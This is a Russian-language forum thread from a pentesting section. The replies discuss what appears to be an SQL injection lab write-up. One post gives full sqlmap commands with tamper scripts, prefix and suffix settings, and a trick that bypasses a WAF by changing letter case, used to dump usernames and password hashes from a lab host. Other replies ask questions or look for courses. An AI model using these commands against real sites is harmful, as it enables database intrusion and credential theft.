HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 19.01.2017, 20:58
mastanggt
Новичок
Регистрация: 17.01.2017
Сообщений: 0
С нами: 4905682

Репутация: 0
По умолчанию

А почему в конце пишем
Цитата:

~~DarkNode~~ сказал(а):

-- -

а не просто -- ?
-- это начинается комментарий, а зачем еще одна черточка через пробел?
 
Ответить с цитированием

  #22  
Старый 28.01.2017, 14:22
MrBa
Новичок
Регистрация: 10.01.2017
Сообщений: 11
С нами: 4915766

Репутация: 0
По умолчанию

Цитата:

~~DarkNode~~ сказал(а):

Вот пару старых моих видео про работу руками если кому интересно:

эх, оооооочень интересно (( ... хочется глянуть на работу мастера. Зачем там хайд?
 
Ответить с цитированием

  #23  
Старый 09.02.2017, 09:31
MrBa
Новичок
Регистрация: 10.01.2017
Сообщений: 11
С нами: 4915766

Репутация: 0
По умолчанию

У меня вопрос по PAYLOAD. Из дампера у меня есть готовый пэйлоад. Дамп качает крокозябры и никак не могу получить нормальный результат. Пробую мэпом - говорит что атрибут не имеет уязвимости. Как в мэп вставить готовый PAYLOAD из дампа?
Спасибо
 
Ответить с цитированием

  #24  
Старый 19.04.2017, 21:15
pyz
Новичок
Регистрация: 02.02.2017
Сообщений: 0
С нами: 4881558

Репутация: 0
По умолчанию

Цитата:

ghostphisher сказал(а):

Как обычно на отлично!
Теперь у меня остался один не решенный вопрос - --code=200 --prefix "')" --suffix=" -- - " <--- если бы это не было указано, скульмап не нашел бы это самостоятельно. Из чего получается, что с префиксами и суфиксами требуется ручная работа. Верно я понимаю?

дополнение:

[18:54:24] [INFO] analyzing table dump for possible password hashes
Database: site
Table: users
[1 entry]
+----+-----------+
| id | username |
+----+-----------+
| 1 | e.lindsey |
+----+-----------+

Но хэша нет...

sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 --tables --common-tables -T users --dump

пробовал так. что опять упустил?
ЕСТЬ КОНТАКТ!!! Для того что-бы вытянуть хеш из колонки "password" в таблице "users" была оставлена подсказка самим автором в посте))), а именно автором было указано что колонка "password" защищена WAFом, меняем регистр на "PasSwoRd" и вуаля...
sqlmap -u http://192.168.101.9:443/post.php?id=1 -p id --flush-session --tamper randomcase --random-agent --threads 10 -D site -T users -C username,PasSwoRd --dump --batch
 
Ответить с цитированием

  #25  
Старый 05.01.2018, 17:26
Qmakake
Новичок
Регистрация: 20.12.2017
Сообщений: 0
С нами: 4419817

Репутация: 0
По умолчанию

Спасибо за статью, очень круто!!!
[doublepost=1515158804,1513804098][/doublepost]спасибо огромное за статьи, очень интересно.
Вы как профессионал, могли бы посоветовать какую-то школу, курсы или книги по обучению ИБ и пентесту в частности!?
 
Ответить с цитированием

  #26  
Старый 05.01.2018, 18:22
r0hack
Постоянный
Регистрация: 11.12.2017
Сообщений: 512
С нами: 4432095

Репутация: 0


По умолчанию

Цитата:

Qmakake сказал(а):

Вы как профессионал, могли бы посоветовать какую-то школу, курсы или книги по обучению ИБ и пентесту в частности!?

Скоро будет открыта школа античат

Цитата:

Qmakake сказал(а):

книги

В грей секции много полезных книг: https://codeby.net/account/upgrades
 
Ответить с цитированием

  #27  
Старый 05.01.2018, 18:32
Qmakake
Новичок
Регистрация: 20.12.2017
Сообщений: 0
С нами: 4419817

Репутация: 0
По умолчанию

Цитата:

r0hack сказал(а):

Скоро будет открыта школа античат

В грей секции много полезных книг: https://codeby.net/account/upgrades
Спасибо, а как записаться в школу, где посмотреть инфу по ней?
 
Ответить с цитированием

  #28  
Старый 05.01.2018, 18:33
r0hack
Постоянный
Регистрация: 11.12.2017
Сообщений: 512
С нами: 4432095

Репутация: 0


По умолчанию

Цитата:

Qmakake сказал(а):

Спасибо, а как записаться в школу, где посмотреть инфу по ней?

Информация скоро появится на форуме.
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.